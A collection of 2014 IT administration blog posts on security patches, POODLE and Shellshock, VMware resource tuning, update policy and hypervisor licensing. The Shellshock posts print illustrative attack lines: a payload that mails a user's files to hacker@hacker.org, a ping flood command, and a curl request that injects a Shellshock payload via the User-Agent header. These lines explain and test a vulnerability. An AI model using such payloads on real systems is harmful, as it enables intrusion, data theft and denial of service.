Just When You Thought Your Devices Were Secure…

Last month’s Shell Shock bug had Unix, Linux and network admins patching their systems against a bash shell vulnerability. This month everyone gets to play along, as October brings patches from Microsoft, Adobe and Oracle, plus a new SSL bug named POODLE.

  • Microsoft October 2014 patches
    Microsoft has issued 3 Critical and 5 Important patches. One of the Critical patches addresses 14 vulnerabilities in Internet Explorer versions 6 through 11, although the bugs are only rated Moderate in IE 6. As discussed in a previous post, Microsoft can’t test every possible configuration, so I suggest installing patches on test systems before deploying them throughout your Windows environment.

  • Adobe Flash Player patches
    Adobe has issued patches for both ColdFusion (Important) and Flash Player (Critical). The Critical Flash Player patches cover Windows, Mac, Linux, Android and iOS and include fixes for both Flash Player and Adobe AIR. Adobe also recommends upgrading to the latest versions in addition to patching, and you’re better off patching and upgrading Flash sooner rather than later. You may also want to consider using a Flash Block/Flash Control plugin, or configuring IE to require per-site approval before running Flash Player content.

  • Oracle Critical Patch Update
    The National Vulnerability Database lists 131 CVE vulnerabilities for Oracle in October 2014. The patches also cover Oracle’s Java, Solaris and MySQL acquisitions, and the Java SE patches for Windows rate as high as 10 out of 10 in severity. The Oracle update page provides an extensive risk matrix for each of the patched applications – use this to evaluate the severity of the vulnerabilities for your specific applications, then test and patch accordingly.

  • POODLE bug in SSL3.0
    POODLE stands for Padding Oracle On Downgraded Legacy Encryption (CVE-2014-3566), and it allows an attacker who can intercept traffic to decrypt portions of less secure SSL 3.0 connections. Most web servers and clients use the more secure TLS protocols for HTTPS connections and will fall back to SSL 3.0 only for legacy applications. However, it is possible for attackers to interfere with an HTTPS session negotiation so that TLS fails and the session falls back to SSL 3.0, allowing this bug to be exploited. The fix for POODLE is to remove the SSL 3.0 protocol from web servers and clients, or to disable the fallback to SSL 3.0 if you need to maintain legacy applications. This vulnerability should be addressed for both web servers and web clients as soon as possible, but it is rated 4.3 (Medium) and is nowhere near the threat level of either Shell Shock or Heartbleed.

    Microsoft provides instructions on a registry edit to disable SSL 3.0 for IIS web servers and askubuntu.com has information on how to remove SSL 3.0 support for Apache, Nginx and other web servers. Qualys SSL Labs provides an SSL Server test that will evaluate the security of your site for SSL 3.0 and other potential vulnerabilities.
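
    As a rough sketch of what those changes look like (the exact file and directive locations will vary with your web server version and distribution), disabling SSL 3.0 is a one-line protocol setting on Apache and Nginx, and a registry value on IIS:

      # Apache: in the SSL configuration or virtual host, allow everything except SSL 3.0
      SSLProtocol all -SSLv3

      # Nginx: in the server block, list only the TLS protocols
      ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

      # IIS: per Microsoft's instructions, set this DWORD registry value to 0 and reboot
      # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server\Enabled

    Restart the web server after the change and re-run the Qualys SSL Server test to confirm that SSL 3.0 is no longer offered.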

    Qualys also provides a browser test for SSL 3.0 support. Eventually newer browsers will stop supporting SSL 3.0 but until then it can be disabled:

    • Firefox
      Set “security.tls.version.min” to 1 in “about:config” – or use the Disable SSL 3.0 plugin to do it for you.

    • Google Chrome
      You can use the startup flag “--ssl-version-min=tls1” to start Chrome without SSL 3.0 support. Recent versions of Chrome also support the TLS_FALLBACK_SCSV mechanism, which prevents failing back to SSL 3.0.

    • Internet Explorer
      In Tools – Internet Options – Advanced – Security, uncheck the boxes for SSL 2.0 and SSL 3.0.

Maximizing VM Performance and CPU Utilization

In a previous post we discussed memory management in VMware and the allocation of memory. Memory over allocation is when you provision your virtual machines with more memory than actually exists on the host machines. Memory over allocation works because the hypervisor assigns memory to virtual machines as needed rather than as provisioned. Do you have a server that needs 2 GB of memory for 10 minutes each night and functions at 0.5 GB for the rest of the day? The hypervisor will run the VM with 0.5 GB of memory, increase it to 2 GB as needed for those 10 minutes, and then reclaim the memory when it hasn’t been used for a while and is needed elsewhere.

The safest scenario is to plan for the case where all VMs are using their maximum memory allocation and to assign only the resources that actually exist. However, this leaves a lot of idle memory on the table that could be used for additional VMs. If you use that idle memory to provision additional VMs, the (unlikely) worst case would be all the VMs spiking to 100% of their memory at the same time, causing the hypervisor to start swapping and leading to severe performance degradation. For a mission critical VM, the extra capacity you gain from memory over allocation isn’t worth that risk. However, if you need to squeeze in a couple more web servers or virtual desktops, memory over allocation is useful.

Just as with VM memory, CPU is usually highly underutilized and can be over allocated without compromising performance. As per the Performance Best Practices for VMware vSphere 5.5:

In most environments ESXi allows significant levels of CPU overcommitment (that is, running more vCPUs on a host than the total number of physical processor cores in that host) without impacting virtual machine performance.
(p. 20)

Without over allocation the total number of vCPUs is limited to the number of physical CPU cores (pCPU) on a host:

(# Processor Sockets) X (# Cores per Processor) = # Physical Processor Cores (pCPU)

If the physical processors use hyperthreading:

(# pCPU) X (2 logical processors per core) = # Logical Processors

If you’ve got 2 processors with 6 cores each, that provides 12 pCPUs, or 24 logical processors with hyperthreading enabled. However, hyperthreading works by providing a second execution thread to an existing core: when one thread is idle or waiting, the other thread can execute instructions. This can increase efficiency if there is enough CPU idle time to keep two threads scheduled, but in practice the performance gain is up to about 30% rather than the doubling suggested by the logical processor count, so those 12 cores behave more like 15 or 16 cores’ worth of throughput than 24.

In addition to considering the effect of hyperthreading, you will also need to consider the type of workloads being run by the processors and whether you are using NUMA (Non-Uniform Memory Access) hardware. We’ll delve into the intricacies of tuning vCPUs, workloads, and host hardware in a later post. For now, Best Practices for Oversubscription of CPU, Memory and Storage suggests starting with one vCPU per VM and increasing as needed, and it quotes recommended maximum vCPU-to-pCPU ratios ranging from 1.5:1 to 15:1.

The Best Practices paper lists several metrics to monitor in order to determine the best vCPU to pCPU ratio for your environment:

  • VM CPU Utilization: to determine if a VM requires additional vCPU resources.
  • Host CPU Utilization: to determine overall pCPU utilization.
  • CPU Ready: measures the amount of time a VM has to wait for pCPU resources. VMware recommends this should be less than 5%.

Maximum CPU for both Host and VM is typically set at 80% but this value should be adjusted depending on your workload and hardware.
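
If you are pulling CPU Ready from the vCenter performance charts rather than reading the %RDY column in esxtop, note that the counter (cpu.ready.summation) is reported in milliseconds and has to be converted to a percentage of the sampling interval before comparing it to the 5% guideline. A rough conversion, assuming the default 20-second real-time sample interval:

CPU Ready % = (CPU Ready summation in ms / sample interval in ms) X 100

For example, 1000 ms of ready time in a 20,000 ms sample works out to 5%, right at the recommended ceiling. The summation covers all of a VM’s vCPUs, so divide by the vCPU count when judging a multi-vCPU machine.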

Shell Shock Patch Update

Five additional bash bugs have been discovered since our post about the CVE-2014-6271 Shell Shock bug last week: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187. Vendors have been issuing patches to address the vulnerabilities as they were announced, and early versions of the Shell Shock patches do not cover all of the vulnerabilities. ZDNet has a good write-up of tests that can be used to determine which vulnerabilities have been patched and which are still open to attack.
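
As an example of the kind of check in that write-up, one widely circulated test for CVE-2014-7169 (the bug left open by the first round of patches) is:

env X='() { (a)=>\' bash -c "echo date"; cat echo

On a still-vulnerable system this writes the output of the date command into a file named echo in the current directory, which the cat then displays; on a patched system the command produces a syntax error and the cat fails. Delete the stray echo file if one was created, and see the ZDNet article for tests covering the remaining CVEs.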

As previously mentioned, operating systems and network devices that use bash will need to be patched:

  • Apple: The Register has an update with links to Apple patches.
  • Cisco: A frequently updated Cisco Security Advisory breaks down supported Cisco products into “Under Investigation”, “Vulnerable”, and “Confirmed Not Vulnerable”, and provides instructions on how to patch vulnerable products or how to purchase upgrades if you don’t have Cisco support.
  • F5: F5 provides a list of vulnerability assessments by product and version.
  • Oracle: Oracle’s security advisory uses the same Vulnerable/Not Vulnerable/Under Investigation breakdown as Cisco and provides links to available patches. You will need an Oracle account to get the patches.
  • VMware: VMware’s Knowledge Base article 2090740 states that while ESX 4.0 and 4.1 are no longer supported they are potentially vulnerable and VMware will provide patches. The complete list of patches is available at VMSA-2014-0010 and includes patches for VMware virtual appliances. ESXi is not vulnerable as it uses the ash shell instead of bash.

If your vendor is not in the list above, check with them directly, and check back for updates frequently.

Are You Vulnerable to the Shell Shock Bug?

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively malware and virus free. Not completely secure, but relatively so. One avenue of attack for Linux and other Unix variants is that they have some basic core utilities that were written before internet security was a significant consideration, and potential exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As per the explanation from seclists.org, the problem is that the bash shell in Unix/Linux allows an environment variable to contain a function definition, but bash continues to process any code that follows the end of that function definition. The following command contains an example of the flaw that can be used to determine if you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re ok. The problem part of the command above is the “echo you are vulnerable” section, as it can be replaced with any command. In most cases the Shell Shock bug won’t run with root permissions, so it won’t be able to delete system files. However, even a minimally privileged user account can mail all of a user’s files to a hacker (cd; cat * | mail -s "all my files" hacker@hacker.org), or set a computer up as a node in a DDoS attack (ping -c 9999999 ddos.target.com), or fill in your own computer security worst nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded into the “internet of everything”, and is the default shell on Apple’s OS X. The problem isn’t that the bug is difficult to patch; the problem is that it is difficult to find and patch every bash installation that has this vulnerability. Given the patch issues Apple has had recently, they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact it may be worse, because it’s easier to exploit. Heartbleed relied on the chance of finding confidential information in a random memory dump. Shell Shock can be exploited through HTTP headers passed to CGI scripts, and mostly just depends on finding a vulnerable device. Hackers had created worms to find and exploit vulnerable devices less than a day after the vulnerability was announced.
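
To illustrate the CGI attack path (the host and script names below are made up), a single request like the following is enough: the web server copies the User-Agent header into the HTTP_USER_AGENT environment variable before invoking the CGI script, and a vulnerable bash then executes whatever follows the function definition:

curl -H 'User-Agent: () { :; }; /bin/ping -c 1 attacker.example.com' http://victim.example.com/cgi-bin/status.sh

Worms and scanners simply loop requests like that across large address ranges looking for servers that respond.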

In the last post I discussed how it’s a good idea to wait before you apply some patches. For OS patches like the quickly pulled iOS 8.0.1 you’re better off waiting. Security patches should be applied as soon as possible. With a vulnerability like Shell Shock you need to check all your systems, patch them as soon as patches are available and enact a mitigation plan until everything is patched.

Unfortunately final patches may take a while and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.


10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.

Should Automatic Updates Be Enabled On Your Computer?

In the best of all possible worlds every software update would work perfectly and there would be no question about whether you should enable automatic updates. However, updates can and do cause significant problems, ranging from annoying errors to blue screen crashes, which raises the question of whether automatic updates should be used at all.

When it comes to patch problems, Microsoft is an easy and obvious target. They issue patches on a known schedule and have an install base diverse enough that it’s impossible for them to test every patch with every software permutation. Software incompatibilities are inevitable and problems are widely publicized, but Microsoft eventually sorts out the problems and withdraws or reissues patches. In the case of Microsoft patches it is usually best to wait a few days to check for problems in the field before installing.

Patching third party software is just as critical as patching your operating system and these patches can have problems as well. As reported by The Register an update to Symantec’s Norton Internet Security (NIS) via their Live Update just before Labor Day weekend caused browsers to crash, mainly on systems running XP. Since Microsoft no longer provides patches for XP, third party security products (such as NIS) may be used as the primary line of defense for XP users, and the interim advice quoted on Symantec forums of upgrading to Windows 7 or turning off browser protection was not particularly helpful. Eventually a fix was disseminated through Live Update and the problem was purported to have been caused by older hardware rather than XP itself.

One of the significant differences between Microsoft OS patches and third party software patches is that a problem with an OS patch is more likely to cause a system crash, while a problem with a third party patch is more likely to affect only the program being patched. Security software updates such as virus definitions may need to be disseminated quickly, and even with the possibility of software problems you’re better off with the updated definitions.

This prompts the question – what should be automatically updated? By default most third party software is configured to update automatically. Should you go through each of your programs and reconfigure them to only install patches that you have approved?

The answer is that it depends:

  • Do you have alternate software with the same functionality?
    If you have Chrome, IE, Firefox and Opera, and a bad patch takes out one of them, the others are still available to search for and download fixes.

  • Is your operating system configured in some way that may not have been tested when the patch was created?
    Are you running relatively old hardware? Do you have an English language OS with Asian and/or Cyrillic fonts installed? Have you tweaked the settings in your antivirus program? Make sure you’ve backed your system up before applying any patches and that you know how to restore it. As we discussed in a previous post, not every software permutation can be tested and incompatibilities can cause blue screens.

  • Is your OS officially supported for the software?
    Programs written for XP may work on newer Windows versions but OS updates could break dependencies in legacy software. Keep track of OS updates and check the functionality of legacy software to determine if a patch needs to be rolled back to keep the software working.

  • Is the software frequently patched? Are critical vulnerabilities being patched?
    Adobe Reader and Adobe Flash Player are both patched frequently, often for critical vulnerabilities, and the Java Runtime Environment (JRE) is another high-value target on your computer. Adobe products and the JRE should be configured for automatic updates, as should virus definitions.

Keep in mind that the chance of a patch causing a problem is relatively small, and even a patched system will never be completely safe. There will always be a gap between when newly discovered vulnerabilities start to be exploited and when patches are available for them. The only way to address that gap is by training your users on what they should not be doing on the internet.

512k Day Isn’t the Cloud’s Only Network Problem

August 12th was 512k day – the day when the number of entries in the IPv4 BGP routing table reached 512k routes. This matters because some routers have a default limit of 512k IPv4 routes, and if these routers haven’t been modified to increase the limit they can crash or fail to load new routes. There are fixes for this problem and not all routers are affected, but even with advance notice there were still outages and slowdowns when the number of routes passed 512k.

The thing to note about this outage isn’t just that known problems went unaddressed; it’s that even if your network were configured perfectly, and a remote resource vendor were delivering a promised 99.999% uptime, there could still be a service outage from your perspective if there was a problem in the network between you and your provider. This is especially important when considering moving your resources to the cloud. While a cloud-based EMR system may provide tremendous benefits at a cost-effective rate, a doctor can’t do their job if there is a problem with the hospital’s internet connection and they can’t get test results or medical history.

The 512k limit wasn’t the first network disruption and it will not be the last. As soon as a clever way is developed to manage the internet, an even more clever way will be found to hack it. Basic infrastructure equipment that has been working for years without any issues can become a victim of specifications that are now obsolete. In short, there is no way to guarantee uptime for anything accessed over the internet. Accepting the possibility of downtime is the price you pay for the economies of Cloud computing.

If you can accept the possibility of downtime and Cloud computing is a fit for your company, one main criterion in selecting a Cloud provider should be its availability as seen from your site. Test to verify that you can consistently access the provider with minimal latency during your trial period, and archive the data to create your own availability SLA reports for each prospective vendor. Collect data on network bandwidth for each provider as well, and extrapolate the data from your test environment up to estimated usage in a full deployment.
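
If you want something concrete to generate that data, even a minimal probe run from cron during the trial will do. The sketch below is a single shell command with a placeholder provider URL and log path; each run records a timestamp, the HTTP status code, and the total response time:

echo "$(date -u +%Y-%m-%dT%H:%M:%SZ) $(curl -s -o /dev/null -w '%{http_code} %{time_total}' https://provider.example.com/)" >> ~/provider-availability.log

A few weeks of that log gives you real availability and latency numbers as seen from your site that you can compare across prospective vendors.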

To look at a provider’s performance over a longer term, services such as downdetector.com aggregate user reports of downtime and can provide an archive of previous issues. Downtime from the perspective of previous clients can also provide insight into how a Cloud vendor handles support issues after you’ve implemented their software. Detailed post-mortems of issues are welcome but not the norm. However support through Twitter and updates via Facebook are common and provide a history of previous issues.

Should network outages mean you have to rule out Cloud computing? The possibility of outages is definitely a factor to consider, but how significant those outages are to you will depend on your network, the Cloud provider, and how sensitive you are to losing services.

Windows Patch Problems

The Windows August Update released on 8/12/14 included 4 updates for Windows 7, 8 and 8.1 that were linked to blue screens. Since the release, all 4 patches have been pulled back by Microsoft, but if you have Automatic Updates configured on your computer and the patches were applied, Microsoft has provided manual instructions for removing them (see the section on Mitigations). Please note that the removal steps are performed in safe mode – if your computer won’t boot to safe mode you may need to resort to whatever recovery utilities came with your PC.
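
If one of these patches does need to come off, the Microsoft instructions mentioned above cover the exact steps (including the safe mode requirement), but as a general sketch, a specific update can be removed from an elevated command prompt with wusa and the KB number:

wusa /uninstall /kb:2982791 /norestart

The same thing can be done from Control Panel under Windows Update, View installed updates.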

If you have Automatic Updates configured to download patches and ask before installing, check the list of recommended patches and make sure the following patches are not selected for installation:

  • 2982791  MS14-045: Description of the security update for kernel-mode drivers: August 12, 2014
  • 2970228  Update to support the new currency symbol for the Russian ruble in Windows
  • 2975719  August 2014 update rollup for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2
  • 2975331  August 2014 update rollup for Windows RT, Windows 8, and Windows Server 2012

This isn’t the first time patches have been released and then pulled back or needed to be patched themselves:

This is by no means a complete list, but it illustrates that patches intended to make a system perform better and run more securely can have unintended consequences. The problem is not that the patches haven’t been tested before release, but rather that there is no way to test every possible system permutation. For example, the April 2013 issue was caused by third party banking security software from Brazil, and the most recent patch problem happened when “OpenType Font files are installed in non-standard font directories that are recorded in the registry with fully qualified filenames”.

Does the chance of a crash mean you should disable updates? Of course not – that would leave your computer vulnerable to security problems. It does mean that you should turn off fully automatic installation and require updates to be approved before they are installed. In addition, check for reports of issues with updates before installing them, and only apply patches intended for your system.

VMware or Hyper-V? Part 3: Virtualization Licensing Costs

In the last post we looked at the cost for licensing Microsoft operating systems on virtual machines – and noted that the licensing costs were the same regardless of the hypervisor used. The cost difference for hypervisors is primarily based on licensing advanced features – so to determine your licensing costs, you need to determine which advanced features are required in your environment.

If you look at the features available in the free hypervisor versions, Hyper-V provides more functionality than ESXi. For example, Live Migration and Failover Clustering are available with Hyper-V, while the corresponding VMware features – vMotion and VMware HA – are not available until you purchase a VMware “Essentials Plus” license. It is possible that all the virtualization features you require are available in the free version of Hyper-V or VMware. However, VMware and Hyper-V implement features differently, and you may find that paying for vMotion is a better fit than free Live Migration, or that free Failover Clustering works just as well for you as paid VMware HA. Fortunately, both VMware’s vSphere and Hyper-V’s System Center Virtual Machine Manager (SCVMM) provide trial versions so you can test feature implementation for yourself and decide if free is good enough, or if a licensed feature is worth paying for.

Once you have your trial environments in place, it can still be difficult to compare “advanced” features not only because similar features have different names, but also because functions don’t overlap completely, and it is not possible to do an apples-to-apples comparison. The agnostic hypervisor comparison application at Virtualization Matrix does a very good job of normalizing virtualization features for comparison without biasing the feature descriptions – and it also provides a useful outline of which features are provided by each licensing model.

Hyper-V Licensing

Hyper-V advanced features are available through the Virtual Machine Manager (VMM) component in Microsoft’s System Center (SC). SC uses a Management License model that charges based on the number of processors and managed operating system environments (OSEs). Much like the Windows 2012 Standard and Datacenter Editions described in the previous post, System Center has Standard and Datacenter Management License Editions:

  • Hyper-V without System Center: free; no processor restrictions; no OSE Management Licenses required.
  • System Center 2012 R2 Standard Edition: $1323; covers 2 physical processors; includes 2 OSE Management Licenses.
  • System Center 2012 R2 Datacenter Edition: $3607; covers 2 physical processors; includes unlimited OSE Management Licenses.

In addition to the base licensing above, how you manage the combination of processor and OSE counts in the System Center Standard/Datacenter Editions can have a significant influence on your licensing costs. For example, the following comparison shows the cost for System Center to manage 12 OSEs on either 2 or 6 processors, using both Datacenter and Standard licenses:

  • 12 OSEs on 2 physical processors: 1 Datacenter license ($3607) vs. 6 Standard licenses ($7938)
  • 12 OSEs on 6 physical processors: 3 Datacenter licenses ($10821) vs. 6 Standard licenses ($7938)

Datacenter licenses are more cost effective in environments where you are running more than 2 OSEs per physical processor, while Standard licenses become more cost effective at 2 or fewer OSEs per physical processor. As a result, Standard licenses can be less expensive if your VMs are assigned multiple virtual processors (and you therefore run fewer OSEs per host), while Datacenter licenses will be less expensive when VMs are provisioned with fewer vCPUs and packed more densely.
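
Using the list prices above, the break-even point on a 2-processor host is easy to work out: each Standard license adds 2 managed OSEs, so 4 OSEs cost 2 X $1323 = $2646 (cheaper than a single $3607 Datacenter license), while 6 OSEs cost 3 X $1323 = $3969, at which point the one Datacenter license wins.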

vSphere Licensing

“vSphere” is the name for the overall VMware management environment, including the ESXi hypervisor, the vCenter management server, and any other VMware virtualization components (e.g. vSAN storage or VMware NSX virtual networking). vSphere licensing is available as Essentials or Essentials Plus Kits for small business environments, or Standard, Enterprise and Enterprise Plus Editions for larger environments. The Essentials Plus Kit and Standard Edition provide the bulk of the functionality needed for small business environments (vMotion, High Availability, vSphere Replication, etc.), while higher end performance tuning features like Flash Read Cache are only available at the Enterprise and Enterprise Plus level.

vSphere Essentials Kits have pricing targeted at smaller organizations. Essentials Kits include a vCenter license which can be applied to up to 3 servers with 2 processors each. The vSphere Standard, Enterprise and Enterprise Plus Edition licenses are per processor, and each processor license requires at least 1 year of initial support and at least 1 vCenter license:
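
As a rough illustration using the list prices below (actual pricing varies by reseller and agreement), a small 3-host cluster with 2 processors per host licensed at the Standard level would need 6 processor licenses (6 X $995 = $5970) plus a vCenter license and a year of support on each license, while the Essentials Plus Kit covers the same 3-server, 2-processor footprint, vCenter license included, for $4495.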

  • Essentials Kit: $495 (3 servers with 2 processors each); Basic Support $65, Production Support $299/incident
  • Essentials Plus Kit: $4495 (3 servers with 2 processors each); Basic Support $944, Production Support $1124
  • Standard (requires vCenter): $995 per processor; Basic Support $273, Production Support $323
  • Enterprise (requires vCenter): $2875 per processor; Basic Support $604, Production Support $719
  • Enterprise Plus (requires vCenter): $3495 per processor; Basic Support $734, Production Support $874
  • vCenter Foundation: $1495; Basic Support $545, Production Support $645
  • vCenter Standard: $4995; Basic Support $1049, Production Support $1249

Comparing Costs

If Hyper-V without SCVMM provides all the virtualization features you need, and works in your environment, it’s hard to argue with a price of “free”. However, if Hyper-V doesn’t work well when you test it in your environment, or if you need features that aren’t available in the free Hyper-V install, then vSphere licensing costs may well be comparable to System Center Virtual Machine Manager costs.


Previous posts in our VMware or Hyper-V series:

Part 1: Which hypervisor will work best for your environment?
Part 2: VM Operating System Licenses

VMware or Hyper-V? Part 2: VM Operating System Licenses

In our last post we looked at some of the environmental factors that play into a choice between VMware and Hyper-V: required OS support, hardware compatibility, and ease of use. This post and the next will look at what is often the deciding factor in selecting a hypervisor: Cost.

Software costs can be broken down into the cost for advanced hypervisor features and the cost for licensing virtual machine operating systems. The basic ESXi and Hyper-V hypervisors are free, but you will pay for advanced hypervisor functions – and that will be the topic of the next post. In this post, we’ll take a look at the cost of licensing Windows operating systems running on virtual machines.

As of Windows 2012, Microsoft has changed its licensing model for Windows virtual machine operating systems (OSEs) in the Standard and Datacenter Editions to a processor-based model. The previous model was per-server licensing – your agreement included a specified number of licenses or multiple activation keys, and you could install as many operating systems as you had licenses. You can still apply per-server licenses for Windows 2012 Essentials Edition to virtual machine OSEs, but Windows Server 2012 Standard and Datacenter Editions now also include licenses specifically for virtual machine OSEs. The three Windows Server 2012 editions that focus on virtualization are:

  • Hyper-V Server 2012: free; console install (command line only – no GUI); no processor restrictions; no VM OSE licenses included.
  • Windows Server 2012 Standard Edition: $882; Hyper-V installed as a server role in Windows Server 2012; covers 2 processors; includes 2 VM OSE licenses.
  • Windows Server 2012 Datacenter Edition: $4809 to $6155 (references vary); Hyper-V installed as a server role in Windows Server 2012; covers 2 processors; includes unlimited VM OSE licenses.

Please note – prices will vary depending on your licensing agreement and reseller.

Hyper-V Server 2012 is the Windows equivalent of VMware’s ESXi: it is free, and can be used for basic VM management functions. It is a console installation, with just a command prompt as an interface, so management is done either remotely or through the command line. There are no licenses for virtual machine OSEs provided with Hyper-V Server 2012, so an OSE license will need to be provided for every Windows virtual machine run on Hyper-V Server 2012.

Windows 2012 Standard and Datacenter Edition provide two advantages over the minimal Hyper-V 2012 Server Edition. First, with Hyper-V installed on Standard or Datacenter, you have access to Hyper-V management tools directly on the same server running Hyper-V. Second, both Editions include licenses for virtual machine OSEs: Standard Edition provides licensing for 2 VM OSEs, and Datacenter Edition provides licensing for an unlimited number of VM OSEs.

However, the virtual machine OSE licenses provided by Standard and Datacenter Editions are not restricted to using Hyper-V: they can be used with any hypervisor. Standard and Datacenter licenses are assigned to hardware – specifically they are assigned to processors. It doesn’t matter if the hypervisor running on the processors is Windows 2012’s Hyper-V, or VMware’s ESXi, or Red Hat’s RHEV – the virtual machines managed by the hypervisor can use the licenses provided by Standard or Datacenter Edition.

There are, of course, additional rules as to how Standard and Datacenter Edition licenses can be applied. Microsoft provides a pricing information and FAQ PDF that outlines the basics of Standard and Datacenter Edition licenses:

  • The Standard/Datacenter Edition licenses are processor-based and each license applies to 2 processors. If your server has more than 2 processors, you will need to apply enough additional Edition licenses to cover all of the processors.
  • There is no limit on the number of cores per processor
  • You cannot mix Standard and Datacenter licenses
  • If a virtualization host has multiple Standard Edition licenses, you get 2x VM OSE licenses for each Standard Edition license
  • If a virtual machine moves from one virtualization host to another, the virtual machine OSE license does not move with it – since the OSE licenses for the virtual machines are tied to the processor, the new virtualization server must also have a license for the OSE for that virtual machine. This is not an issue if both virtualization hosts have the unlimited Datacenter Edition licensing for VM OSEs.
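
Putting those rules together in a hypothetical case: a host with 4 processors running 5 Windows Server VMs needs 3 Standard Edition licenses (2 to cover the 4 processors, plus a third to raise the available VM OSE count from 4 to 6), or 2 Datacenter Edition licenses covering the same 4 processors with no limit on the number of VMs.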

Licensing is a spectacularly confusing topic, and you need to carefully read the fine print of your current licensing agreement to determine exactly which and how many Windows operating systems you’re allowed to run as virtual machines. However, the costs will be the same regardless of the hypervisor in use. When comparing overall software costs between Hyper-V and VMware, licensing for advanced virtualization features will be the primary factor – and we will look at that in our next post.


Additional posts in our VMware or Hyper-V series:

Part 1: Which hypervisor will work best for your environment?
Part 3: Virtualization Licensing Costs

VMware or Hyper-V? Part 1: Which hypervisor will work best for your environment?

If you’ve gone through the comparison of Cloud vs Virtualization, and decided that Virtualization is the best fit for you – you’re still not done. The next step is deciding which hypervisor to use for your virtualization. If a significant portion of your environment is Windows, then your primary choices are VMware or Hyper-V.

Comparing VMware and Hyper-V is less of a “which is better” question than a “which would be better for you?” question. You can start by looking at a Hypervisor comparison chart, and while that may narrow down the differences between the two, it will not rule one out unless you need to run an OS that only one of them supports.

Considerations when choosing between VMware and Hyper-V include:

  1. Which operating systems do your Virtual Machines (VMs) need to run?

    If you’re mostly Windows, with a few Linux installs, either will work for you. If you need to support a wide variety of operating systems on your VMs, VMware has much more breadth – see the Hypervisor comparison chart for more details.

  2. Hardware compatibility

    If you’ve already got a significant investment in server hardware, it makes sense to continue to use as much of that hardware as possible for Virtualization hosts. VMware’s Compatibility Guide provides a search that will let you enter your existing server, and tell you which versions of VMware are supported. Got a Dell PowerEdge T110? You should be able to run ESXi 5.5 on it.

    Hyper-V is installed on Windows 2008 or Windows 2012, and it has the same basic installation requirements as the OS; installing the Hyper-V role does require a processor with hardware support for virtualization. Microsoft also maintains a Windows Server Catalog to identify servers that are compatible with Windows 2012 and Hyper-V.

  3. Ease of use

    Hands-on comparisons of VMware and Hyper-V are often biased due to the loyalties and experiences of the reviewer. Additionally, updates to management tools and version capabilities change frequently – for example, one major complaint about the free ESXi 5.1 hypervisor was that it was limited to 32 GB of memory; as of 5.5, that limitation has been removed. So, keep those factors in mind when you read through the following sample of hypervisor comparisons:

    Hyper-V 2012 versus VMWare vSphere 5
    Real Hyper-V vs. VMware comparison: What you actually get for free
    Setting up your Hacking Playground – VMWare vs HyperV
    Hyper-V R2eality: VMs not so hot after all…
    Additionally, take a look at the instructions for the same task on each of the platforms. For example – implementing High Availability (HA) in VMware vs. configuring HA in Hyper-V.

Most reviewers find it easier to implement complex virtualization features with VMware, and these features tend to work better with VMware – provided you’ve paid for the VMware licenses and you’re running on supported hardware. Hyper-V wins points for a wider range of supported hardware, and the ability to configure advanced features without requiring license fees – but it may not be able to do everything VMware does and is more difficult to configure.

In our next post, we’ll take a look at how costs for VMware and Hyper-V compare – including the free editions of both, and what you get when you pay for the licenses.


Additional posts in our VMware or Hyper-V series:

Part 2: VM Operating System Licenses
Part 3: Virtualization Licensing Costs